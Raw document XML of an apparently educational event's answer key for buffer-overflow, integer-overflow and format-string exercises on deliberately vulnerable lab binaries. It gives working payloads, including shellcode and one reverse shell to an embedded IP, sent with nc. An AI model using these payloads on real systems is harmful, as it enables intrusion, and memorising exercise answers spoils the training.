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rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This file contains the solutions to our demos and exercises. Please include a short write up or description about the program, how to exploit it, and what the command for it is. We may hand this out at the end of the event.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>//djiang7 … in progress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Be sure to turn off ASLR!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>buffer_overflow_demo1:</w:t>
        <w:tab/>
        <w:br/>
        <w:t>./buffer_overflow_demo1 "$(python -c 'print "A"*132')"</w:t>
        <w:br/>
        <w:br/>
        <w:t>buffer_overflow_demo2:</w:t>
        <w:br/>
        <w:t>Similar to cs 460 lab. Need to put shellcode in buffer, overflow with A’s, overwrite ret addr with buffer addr to exec shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>./buffer_overflow_demo2 "$(python -c 'print "A"*1028')"</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>Answer: # ./buffer_overflow_demo2 "$(python -c 'print "\x66\x81\xec\x01\x01\xbb\x21\x60\x57\x17\xda\xc2\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x0f\x31\x58\x13\x03\x58\x13\x83\xc0\x25\x82\xa2\x7d\x2e\x1a\xd4\xd0\x56\xf2\xcb\xb7\x1f\xe5\x7c\x17\x6c\x82\x7c\x0f\xbd\x30\x14\xa1\x48\x57\xb4\xd5\x5c\x98\x39\x26\x05\xfb\x51\x49\xe5\xb8\xce\xfb\x82\x4c\x70\x70\x39\xdd\x13\x0c\xa8\x72\xba\x9f\x0b\x8d\x15\x33\xc2\x6c\x54\x33" + "A"*939+"\xd8\xc8\xff\xff"')"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>The address of buffer is 0xffffc8d8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>Congratulations!</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Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>Response:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>The address of buffer is 0xffffc898</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>Congratulations!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>buffer_overflow_example1:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>Overflow buffer to overwrite secret password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>./buffer_overflow_example1 "$(python -c 'print "A"*32')"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:br/>
        <w:t>buffer_overflow_example2:</w:t>
        <w:br/>
        <w:t>Buffer is too small; put shellcode after buffer. Overflow buffer, overwrite ret addr with an address after the ret addr location (buffer address + some amount),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>./buffer_overflow_exercise2 `perl -e 'print("A"x20 . "\x70\xd0\xff\xff" . "\x66\x81\xec\x01\x01" . "\xbb\x21\x60\x57\x17\xda\xc2\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x0f\x31\x58\x13\x03\x58\x13\x83\xc0\x25\x82\xa2\x7d\x2e\x1a\xd4\xd0\x56\xf2\xcb\xb7\x1f\xe5\x7c\x17\x6c\x82\x7c\x0f\xbd\x30\x14\xa1\x48\x57\xb4\xd5\x5c\x98\x39\x26\x05\xfb\x51\x49\xe5\xb8\xce\xfb\x82\x4c\x70\x70\x39\xdd\x13\x0c\xa8\x72\xba\x9f\x0b\x8d\x15\x33\xc2\x6c\x54\x33")'`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>The address of buffer is 0xffffd058</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>Congratulations!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:br/>
        <w:br/>
        <w:t>buffer_overflow_example3:</w:t>
        <w:br/>
        <w:tab/>
        <w:t xml:space="preserve">integer overflow Need to overflow with at least 32668 A’s (to cause integer overflow on short int type. </w:t>
        <w:br/>
        <w:t>./buffer_overflow_example1 "$(python -c 'print "A"*32768')"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>Answer: # ./buffer_overflow_exercise3 "$(python -c 'print "\x66\x81\xec\x01\x01\xbb\x21\x60\x57\x17\xda\xc2\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x0f\x31\x58\x13\x03\x58\x13\x83\xc0\x25\x82\xa2\x7d\x2e\x1a\xd4\xd0\x56\xf2\xcb\xb7\x1f\xe5\x7c\x17\x6c\x82\x7c\x0f\xbd\x30\x14\xa1\x48\x57\xb4\xd5\x5c\x98\x39\x26\x05\xfb\x51\x49\xe5\xb8\xce\xfb\x82\x4c\x70\x70\x39\xdd\x13\x0c\xa8\x72\xba\x9f\x0b\x8d\x15\x33\xc2\x6c\x54\x33" +"A"*941 + "\x96\x4c\xff\xff" + "A"*31734')"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>Response:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>The address of buffer is 0xffff4c96</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>The length of the argument is -32768</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>Congratulations!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>bo_exercise2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>python -c 'print "A"*24 + "\x0c\xcf\xff\xff" + "\x68</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>\xc0\xa8\x01\x0b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>\x5e\x66\x68</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>\xd9\x03</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xce"' | nc localhost 20002</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>Strategy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> This will fill the 16 byte buffer, ebp, and overwrite the ret addr with the start of our shellcode. Instead of being inside the buffer, our shellcode starts after the ret address. This is because the given buffer is too small.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>What it does:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> the shellcode opens a reverse shell to the ip address and port specified in the shellcode (bolded above).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>Warning:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> The server returns the address of the buffer. Through painful debugging I found out that the address provided is 4096 bytes (0x01000) LESS than the actual buffer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="__DdeLink__133_158340753"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>Format_String</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>USEFUL_INFO.txt contains a link to a website that contains some explanations and visuals that might help with format string.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>README.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
